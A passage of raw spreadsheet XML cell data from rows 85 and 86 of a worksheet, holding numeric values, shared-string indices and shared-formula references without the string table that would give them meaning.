      <c r="O85" s="93">
        <v>0.0</v>
      </c>
      <c r="P85" s="93">
        <v>1.0</v>
      </c>
      <c r="Q85" s="93">
        <f t="shared" si="157"/>
        <v>1</v>
      </c>
      <c r="R85" s="93">
        <v>1.0</v>
      </c>
      <c r="S85" s="93">
        <v>0.0</v>
      </c>
      <c r="T85" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U85" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V85" s="96" t="s">
        <v>1529</v>
      </c>
      <c r="W85" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X85" s="97" t="s">
        <v>1530</v>
      </c>
      <c r="Y85" s="96" t="s">
        <v>1531</v>
      </c>
      <c r="Z85" s="126" t="s">
        <v>1532</v>
      </c>
      <c r="AA85" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB85" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC85" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD85" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE85" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF85" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG85" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH85" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI85" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ85" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL85" s="100">
        <v>0.0</v>
      </c>
      <c r="AM85" s="100">
        <v>0.0</v>
      </c>
      <c r="AN85" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP85" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ85" s="100">
        <v>0.0</v>
      </c>
      <c r="AR85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT85" s="100" t="str">
        <f t="shared" si="149"/>
        <v>-</v>
      </c>
      <c r="AU85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX85" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY85" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ85" s="100">
        <v>0.0</v>
      </c>
      <c r="BA85" s="102">
        <v>1.0</v>
      </c>
      <c r="BB85" s="102">
        <v>0.0</v>
      </c>
      <c r="BC85" s="102">
        <v>0.0</v>
      </c>
      <c r="BD85" s="102">
        <v>0.0</v>
      </c>
      <c r="BE85" s="102">
        <v>0.0</v>
      </c>
      <c r="BF85" s="102">
        <v>0.0</v>
      </c>
      <c r="BG85" s="102">
        <v>0.0</v>
      </c>
      <c r="BH85" s="102">
        <v>0.0</v>
      </c>
      <c r="BI85" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ85" s="102">
        <v>0.0</v>
      </c>
      <c r="BK85" s="102">
        <v>0.0</v>
      </c>
      <c r="BL85" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM85" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN85" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO85" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP85" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ85" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR85" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS85" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT85" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU85" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV85" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW85" s="104">
        <v>2001579.0</v>
      </c>
      <c r="BX85" s="104">
        <v>1.0</v>
      </c>
      <c r="BY85" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ85" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA85" s="104">
        <v>2001579.0</v>
      </c>
      <c r="CB85" s="104">
        <v>1.0</v>
      </c>
      <c r="CC85" s="104">
        <v>1.0</v>
      </c>
      <c r="CD85" s="104">
        <v>2001579.0</v>
      </c>
      <c r="CE85" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF85" s="104">
        <f t="shared" si="153"/>
        <v>2001579</v>
      </c>
      <c r="CG85" s="104">
        <v>2001579.0</v>
      </c>
      <c r="CH85" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI85" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ85" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK85" s="104">
        <v>0.0</v>
      </c>
      <c r="CL85" s="104">
        <v>0.0</v>
      </c>
      <c r="CM85" s="105">
        <v>1.0</v>
      </c>
      <c r="CN85" s="105">
        <v>1.0</v>
      </c>
      <c r="CO85" s="105">
        <v>1.0</v>
      </c>
      <c r="CP85" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ85" s="105">
        <v>1.0</v>
      </c>
      <c r="CR85" s="105">
        <v>1.0</v>
      </c>
      <c r="CS85" s="105">
        <v>0.0</v>
      </c>
      <c r="CT85" s="105">
        <v>0.0</v>
      </c>
      <c r="CU85" s="105">
        <v>0.0</v>
      </c>
      <c r="CV85" s="105">
        <v>0.0</v>
      </c>
      <c r="CW85" s="105">
        <v>1.0</v>
      </c>
      <c r="CX85" s="105">
        <v>1.0</v>
      </c>
      <c r="CY85" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ85" s="105">
        <v>1.0</v>
      </c>
      <c r="DA85" s="105">
        <v>1.0</v>
      </c>
      <c r="DB85" s="106">
        <f t="shared" si="122"/>
        <v>1</v>
      </c>
      <c r="DC85" s="106">
        <f t="shared" si="123"/>
        <v>1</v>
      </c>
      <c r="DD85" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE85" s="106">
        <f t="shared" si="125"/>
        <v>1</v>
      </c>
      <c r="DF85" s="106">
        <f t="shared" si="126"/>
        <v>1</v>
      </c>
      <c r="DG85" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH85" s="106">
        <f t="shared" si="127"/>
        <v>1</v>
      </c>
      <c r="DI85" s="106">
        <f t="shared" si="128"/>
        <v>1</v>
      </c>
      <c r="DJ85" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK85" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL85" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM85" s="108">
        <v>2001579.0</v>
      </c>
      <c r="DN85" s="108">
        <v>1.0</v>
      </c>
      <c r="DO85" s="108">
        <v>1.0</v>
      </c>
      <c r="DP85" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ85" s="108">
        <v>2001579.0</v>
      </c>
      <c r="DR85" s="108">
        <v>1.0</v>
      </c>
      <c r="DS85" s="108">
        <v>1.0</v>
      </c>
      <c r="DT85" s="108">
        <v>2001579.0</v>
      </c>
      <c r="DU85" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV85" s="108">
        <f t="shared" si="154"/>
        <v>2001579</v>
      </c>
      <c r="DW85" s="108">
        <v>2001579.0</v>
      </c>
      <c r="DX85" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY85" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ85" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA85" s="108">
        <v>0.0</v>
      </c>
      <c r="EB85" s="108">
        <v>0.0</v>
      </c>
      <c r="EC85" s="109">
        <v>1.0</v>
      </c>
      <c r="ED85" s="109">
        <v>1.0</v>
      </c>
      <c r="EE85" s="109">
        <v>1.0</v>
      </c>
      <c r="EF85" s="109">
        <v>0.0</v>
      </c>
      <c r="EG85" s="109">
        <v>1.0</v>
      </c>
      <c r="EH85" s="109">
        <v>1.0</v>
      </c>
      <c r="EI85" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ85" s="109">
        <v>0.0</v>
      </c>
      <c r="EK85" s="109">
        <v>0.0</v>
      </c>
      <c r="EL85" s="109">
        <v>0.0</v>
      </c>
      <c r="EM85" s="109">
        <v>1.0</v>
      </c>
      <c r="EN85" s="109">
        <v>1.0</v>
      </c>
      <c r="EO85" s="109">
        <v>0.0</v>
      </c>
      <c r="EP85" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ85" s="109">
        <v>1.0</v>
      </c>
      <c r="ER85" s="110">
        <f t="shared" si="130"/>
        <v>1</v>
      </c>
      <c r="ES85" s="110">
        <f t="shared" si="131"/>
        <v>1</v>
      </c>
      <c r="ET85" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU85" s="110">
        <f t="shared" si="133"/>
        <v>1</v>
      </c>
      <c r="EV85" s="110">
        <f t="shared" si="134"/>
        <v>1</v>
      </c>
      <c r="EW85" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX85" s="110">
        <f t="shared" si="136"/>
        <v>1</v>
      </c>
      <c r="EY85" s="110">
        <f t="shared" si="137"/>
        <v>1</v>
      </c>
      <c r="EZ85" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA85" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB85" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC85" s="111" t="s">
        <v>1533</v>
      </c>
      <c r="FD85" s="111">
        <v>4.0</v>
      </c>
      <c r="FE85" s="111">
        <v>116126.0</v>
      </c>
      <c r="FF85" s="101" t="s">
        <v>692</v>
      </c>
      <c r="FG85" s="111">
        <v>2001579.0</v>
      </c>
      <c r="FH85" s="111">
        <v>1.0</v>
      </c>
      <c r="FI85" s="111">
        <v>1.0</v>
      </c>
      <c r="FJ85" s="111" t="s">
        <v>1534</v>
      </c>
      <c r="FK85" s="111" t="s">
        <v>692</v>
      </c>
      <c r="FL85" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2100527, 2002752, 2002749, 2001579, 2001579</v>
      </c>
      <c r="FM85" s="111">
        <v>2100527.0</v>
      </c>
      <c r="FN85" s="111" t="s">
        <v>1535</v>
      </c>
      <c r="FO85" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP85" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ85" s="111">
        <v>0.0</v>
      </c>
      <c r="FR85" s="111">
        <v>0.0</v>
      </c>
      <c r="FS85" s="112">
        <v>1.0</v>
      </c>
      <c r="FT85" s="112">
        <v>1.0</v>
      </c>
      <c r="FU85" s="112">
        <v>116122.0</v>
      </c>
      <c r="FV85" s="112">
        <v>0.0</v>
      </c>
      <c r="FW85" s="112">
        <v>116125.0</v>
      </c>
      <c r="FX85" s="112">
        <v>116125.0</v>
      </c>
      <c r="FY85" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ85" s="112">
        <v>0.0</v>
      </c>
      <c r="GA85" s="112">
        <v>0.0</v>
      </c>
      <c r="GB85" s="112">
        <v>0.0</v>
      </c>
      <c r="GC85" s="112">
        <v>1.0</v>
      </c>
      <c r="GD85" s="112">
        <v>1.0</v>
      </c>
      <c r="GE85" s="112">
        <v>0.0</v>
      </c>
      <c r="GF85" s="112">
        <v>1.0</v>
      </c>
      <c r="GG85" s="112">
        <v>1.0</v>
      </c>
      <c r="GH85" s="113">
        <f t="shared" si="139"/>
        <v>1</v>
      </c>
      <c r="GI85" s="113">
        <f t="shared" si="140"/>
        <v>1</v>
      </c>
      <c r="GJ85" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK85" s="113">
        <f t="shared" si="142"/>
        <v>116122</v>
      </c>
      <c r="GL85" s="113">
        <f t="shared" si="143"/>
        <v>1</v>
      </c>
      <c r="GM85" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN85" s="113">
        <f t="shared" si="145"/>
        <v>116125</v>
      </c>
      <c r="GO85" s="113">
        <f t="shared" si="146"/>
        <v>1</v>
      </c>
      <c r="GP85" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ85" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR85" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS85" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT85" s="94"/>
      <c r="GU85" s="116">
        <v>12588.0</v>
      </c>
      <c r="GV85" s="116">
        <v>1.0</v>
      </c>
      <c r="GW85" s="116">
        <v>1.0</v>
      </c>
      <c r="GX85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD85" s="131">
        <v>12588.0</v>
      </c>
      <c r="HE85" s="131">
        <v>12588.0</v>
      </c>
      <c r="HF85" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG85" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH85" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI85" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ85" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK85" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL85" s="93">
        <v>7.0</v>
      </c>
      <c r="HM85" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN85" s="93">
        <v>1.0</v>
      </c>
      <c r="HO85" s="93">
        <v>0.0</v>
      </c>
      <c r="HP85" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ85" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR85" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS85" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT85" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU85" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV85" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW85" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX85" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC85" s="120" t="str">
        <f t="shared" si="156"/>
        <v>-</v>
      </c>
      <c r="ID85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH85" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II85" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ85" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK85" s="99">
        <v>0.0</v>
      </c>
      <c r="IL85" s="99">
        <v>0.0</v>
      </c>
      <c r="IM85" s="121">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="IN85" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO85" s="98">
        <v>0.0</v>
      </c>
      <c r="IP85" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ85" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR85" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS85" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT85" s="127"/>
      <c r="IU85" s="127"/>
      <c r="IV85" s="127"/>
      <c r="IW85" s="127"/>
      <c r="IX85" s="127"/>
      <c r="IY85" s="127"/>
      <c r="IZ85" s="127"/>
      <c r="JA85" s="127"/>
      <c r="JB85" s="127"/>
      <c r="JC85" s="127"/>
      <c r="JD85" s="127"/>
      <c r="JE85" s="127"/>
      <c r="JF85" s="127"/>
      <c r="JG85" s="127"/>
      <c r="JH85" s="127"/>
      <c r="JI85" s="127"/>
      <c r="JJ85" s="127"/>
      <c r="JK85" s="127"/>
      <c r="JL85" s="127"/>
      <c r="JM85" s="127"/>
      <c r="JN85" s="127"/>
      <c r="JO85" s="127"/>
      <c r="JP85" s="127"/>
      <c r="JQ85" s="127"/>
      <c r="JR85" s="127"/>
      <c r="JS85" s="127"/>
      <c r="JT85" s="127"/>
      <c r="JU85" s="127"/>
      <c r="JV85" s="127"/>
      <c r="JW85" s="127"/>
      <c r="JX85" s="127"/>
      <c r="JY85" s="127"/>
      <c r="JZ85" s="127"/>
      <c r="KA85" s="127"/>
      <c r="KB85" s="127"/>
      <c r="KC85" s="127"/>
      <c r="KD85" s="127"/>
      <c r="KE85" s="127"/>
      <c r="KF85" s="127"/>
      <c r="KG85" s="127"/>
      <c r="KH85" s="127"/>
      <c r="KI85" s="127"/>
      <c r="KJ85" s="127"/>
      <c r="KK85" s="127"/>
      <c r="KL85" s="127"/>
      <c r="KM85" s="127"/>
      <c r="KN85" s="127"/>
      <c r="KO85" s="127"/>
      <c r="KP85" s="127"/>
      <c r="KQ85" s="127"/>
      <c r="KR85" s="127"/>
      <c r="KS85" s="127"/>
      <c r="KT85" s="127"/>
      <c r="KU85" s="127"/>
      <c r="KV85" s="127"/>
      <c r="KW85" s="127"/>
      <c r="KX85" s="127"/>
      <c r="KY85" s="127"/>
      <c r="KZ85" s="127"/>
      <c r="LA85" s="127"/>
      <c r="LB85" s="127"/>
      <c r="LC85" s="127"/>
      <c r="LD85" s="127"/>
      <c r="LE85" s="127"/>
      <c r="LF85" s="127"/>
      <c r="LG85" s="127"/>
      <c r="LH85" s="127"/>
      <c r="LI85" s="127"/>
      <c r="LJ85" s="127"/>
      <c r="LK85" s="127"/>
      <c r="LL85" s="127"/>
      <c r="LM85" s="127"/>
      <c r="LN85" s="127"/>
      <c r="LO85" s="127"/>
      <c r="LP85" s="127"/>
      <c r="LQ85" s="127"/>
      <c r="LR85" s="127"/>
      <c r="LS85" s="127"/>
      <c r="LT85" s="127"/>
      <c r="LU85" s="127"/>
      <c r="LV85" s="127"/>
      <c r="LW85" s="127"/>
      <c r="LX85" s="127"/>
      <c r="LY85" s="127"/>
      <c r="LZ85" s="127"/>
      <c r="MA85" s="127"/>
      <c r="MB85" s="127"/>
      <c r="MC85" s="127"/>
      <c r="MD85" s="127"/>
      <c r="ME85" s="127"/>
      <c r="MF85" s="127"/>
      <c r="MG85" s="127"/>
      <c r="MH85" s="127"/>
      <c r="MI85" s="127"/>
      <c r="MJ85" s="127"/>
      <c r="MK85" s="127"/>
      <c r="ML85" s="127"/>
      <c r="MM85" s="127"/>
      <c r="MN85" s="127"/>
      <c r="MO85" s="127"/>
      <c r="MP85" s="127"/>
      <c r="MQ85" s="127"/>
      <c r="MR85" s="127"/>
      <c r="MS85" s="127"/>
      <c r="MT85" s="127"/>
      <c r="MU85" s="127"/>
      <c r="MV85" s="127"/>
      <c r="MW85" s="127"/>
      <c r="MX85" s="127"/>
      <c r="MY85" s="127"/>
      <c r="MZ85" s="127"/>
      <c r="NA85" s="127"/>
      <c r="NB85" s="127"/>
      <c r="NC85" s="127"/>
      <c r="ND85" s="127"/>
      <c r="NE85" s="127"/>
      <c r="NF85" s="127"/>
      <c r="NG85" s="127"/>
      <c r="NH85" s="127"/>
      <c r="NI85" s="127"/>
      <c r="NJ85" s="127"/>
      <c r="NK85" s="127"/>
      <c r="NL85" s="127"/>
      <c r="NM85" s="127"/>
      <c r="NN85" s="127"/>
      <c r="NO85" s="127"/>
      <c r="NP85" s="127"/>
      <c r="NQ85" s="127"/>
      <c r="NR85" s="127"/>
      <c r="NS85" s="127"/>
      <c r="NT85" s="127"/>
      <c r="NU85" s="127"/>
      <c r="NV85" s="127"/>
      <c r="NW85" s="127"/>
      <c r="NX85" s="127"/>
      <c r="NY85" s="127"/>
    </row>
    <row r="86" ht="246.0" customHeight="1">
      <c r="B86" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C86" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D86" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E86" s="90" t="s">
        <v>1510</v>
      </c>
      <c r="F86" s="90" t="s">
        <v>1511</v>
      </c>
      <c r="G86" s="91" t="s">
        <v>1536</v>
      </c>
      <c r="H86" s="90" t="s">
        <v>1537</v>
      </c>
      <c r="I86" s="92" t="s">
        <v>1538</v>
      </c>
      <c r="J86" s="92" t="s">
        <v>1539</v>
      </c>
      <c r="K86" s="92" t="s">
        <v>1540</v>
      </c>
      <c r="L86" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M86" s="93">
        <v>3.0</v>
      </c>
      <c r="N86" s="93">
        <v>1.0</v>
      </c>
      <c r="O86" s="93">
        <v>0.0</v>
      </c>
      <c r="P86" s="93">
        <v>1.0</v>
      </c>
      <c r="Q86" s="93">
        <f t="shared" si="157"/>
        <v>1</v>
      </c>
      <c r="R86" s="93">
        <v>1.0</v>
      </c>
      <c r="S86" s="93">
        <v>0.0</v>
      </c>
      <c r="T86" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U86" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V86" s="96" t="s">
        <v>1542</v>
      </c>
      <c r="W86" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X86" s="132" t="s">
        <v>1543</v>
      </c>
      <c r="Y86" s="96" t="s">
        <v>1544</v>
      </c>
      <c r="Z86" s="126" t="s">
        <v>1532</v>
      </c>
      <c r="AA86" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB86" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC86" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD86" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE86" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF86" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG86" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH86" s="99" t="s">
        <v>1545</v>
      </c>
      <c r="AI86" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ86" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK86" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AL86" s="100">
        <v>4.0</v>
      </c>
      <c r="AM86" s="100">
        <v>161.0</v>
      </c>
      <c r="AN86" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO86" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AP86" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ86" s="100">
        <v>161.0</v>
      </c>
      <c r="AR86" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AS86" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT86" s="100" t="str">
        <f t="shared" si="149"/>
        <v>366, 29456, 384, 408</v>
      </c>
      <c r="AU86" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV86" s="100" t="s">
        <v>1546</v>
      </c>
      <c r="AW86" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX86" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY86" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ86" s="100">
        <v>0.0</v>
      </c>
      <c r="BA86" s="102">
        <v>3.0</v>
      </c>
      <c r="BB86" s="102">
        <v>0.0</v>
      </c>
      <c r="BC86" s="102">
        <v>77.0</v>
      </c>
      <c r="BD86" s="102">
        <v>161.0</v>
      </c>
      <c r="BE86" s="102">
        <v>0.0</v>
      </c>
      <c r="BF86" s="102">
        <v>0.0</v>
      </c>
      <c r="BG86" s="102">
        <v>0.0</v>
      </c>
      <c r="BH86" s="102">
        <v>0.0</v>
      </c>
      <c r="BI86" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ86" s="102">
        <v>77.0</v>
      </c>
      <c r="BK86" s="102">
        <v>161.0</v>
      </c>
      <c r="BL86" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM86" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN86" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO86" s="103">
        <f t="shared" si="115"/>
        <v>77</v>
      </c>
      <c r="BP86" s="103">
        <f t="shared" si="116"/>
        <v>77</v>
      </c>
      <c r="BQ86" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR86" s="103">
        <f t="shared" si="118"/>
        <v>161</v>
      </c>
      <c r="BS86" s="103">
        <f t="shared" si="119"/>
        <v>161</v>
      </c>
      <c r="BT86" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU86" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV86" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW86" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="BX86" s="104">
        <v>5.0</v>
      </c>
      <c r="BY86" s="104">
        <v>203.0</v>
      </c>
      <c r="BZ86" s="101">
        <v>210366.0</v>
      </c>
      <c r="CA86" s="104" t="s">
        <v>1546</v>
      </c>
      <c r="CB86" s="104">
        <v>4.0</v>
      </c>
      <c r="CC86" s="104">
        <v>161.0</v>
      </c>
      <c r="CD86" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="CE86" s="104">
        <v>210366.0</v>
      </c>
      <c r="CF86" s="104" t="str">
        <f t="shared" si="153"/>
        <v>366, 29456, 384, 408, 2100366</v>
      </c>
      <c r="CG86" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH86" s="104" t="s">
        <v>1547</v>
      </c>
      <c r="CI86" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ86" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK86" s="104">
        <v>0.0</v>
      </c>
      <c r="CL86" s="104">
        <v>0.0</v>
      </c>
      <c r="CM86" s="105">
        <v>0.0</v>
      </c>
      <c r="CN86" s="105">
        <v>0.0</v>
      </c>
      <c r="CO86" s="105">
        <v>77.0</v>
      </c>
      <c r="CP86" s="105">
        <v>161.0</v>
      </c>
      <c r="CQ86" s="105">
        <v>42.0</v>
      </c>
      <c r="CR86" s="105">
        <v>161.0</v>
      </c>
      <c r="CS86" s="105">
        <v>0.0</v>
      </c>
      <c r="CT86" s="105">
        <v>0.0</v>
      </c>
      <c r="CU86" s="105">
        <v>0.0</v>
      </c>
      <c r="CV86" s="105">
        <v>0.0</v>
      </c>
      <c r="CW86" s="105">
        <v>0.0</v>
      </c>
      <c r="CX86" s="105">
        <v>77.0</v>
      </c>
      <c r="CY86" s="105">
        <v>161.0</v>
      </c>
      <c r="CZ86" s="105">
        <v>0.0</v>
      </c>
      <c r="DA86" s="105">
        <v>161.0</v>
      </c>
      <c r="DB86" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC86" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD86" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE86" s="106">
        <f t="shared" si="125"/>
        <v>77</v>
      </c>
      <c r="DF86" s="106">
        <f t="shared" si="126"/>
        <v>77</v>
      </c>
      <c r="DG86" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH86" s="106">
        <f t="shared" si="127"/>
        <v>161</v>
      </c>
      <c r="DI86" s="106">
        <f t="shared" si="128"/>
        <v>161</v>
      </c>
      <c r="DJ86" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK86" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL86" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM86" s="108" t="s">
        <v>1547</v>
      </c>
      <c r="DN86" s="108">
        <v>5.0</v>
      </c>
      <c r="DO86" s="108">
        <v>203.0</v>
      </c>
      <c r="DP86" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ86" s="108" t="s">
        <v>1546</v>
      </c>
      <c r="DR86" s="108">
        <v>4.0</v>
      </c>
      <c r="DS86" s="108">
        <v>161.0</v>
      </c>
      <c r="DT86" s="108" t="s">
        <v>1547</v>
      </c>
      <c r="DU86" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV86" s="108" t="str">
        <f t="shared" si="154"/>
        <v>366, 29456, 384, 408, 2100366</v>
      </c>
      <c r="DW86" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX86" s="108" t="s">
        <v>1547</v>
      </c>
      <c r="DY86" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ86" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA86" s="108">
        <v>0.0</v>
      </c>
      <c r="EB86" s="108">
        <v>0.0</v>
      </c>
      <c r="EC86" s="109">
        <v>3.0</v>
      </c>
      <c r="ED86" s="109">
        <v>0.0</v>
      </c>
      <c r="EE86" s="109">
        <v>77.0</v>
      </c>
      <c r="EF86" s="109">
        <v>161.0</v>
      </c>
      <c r="EG86" s="109">
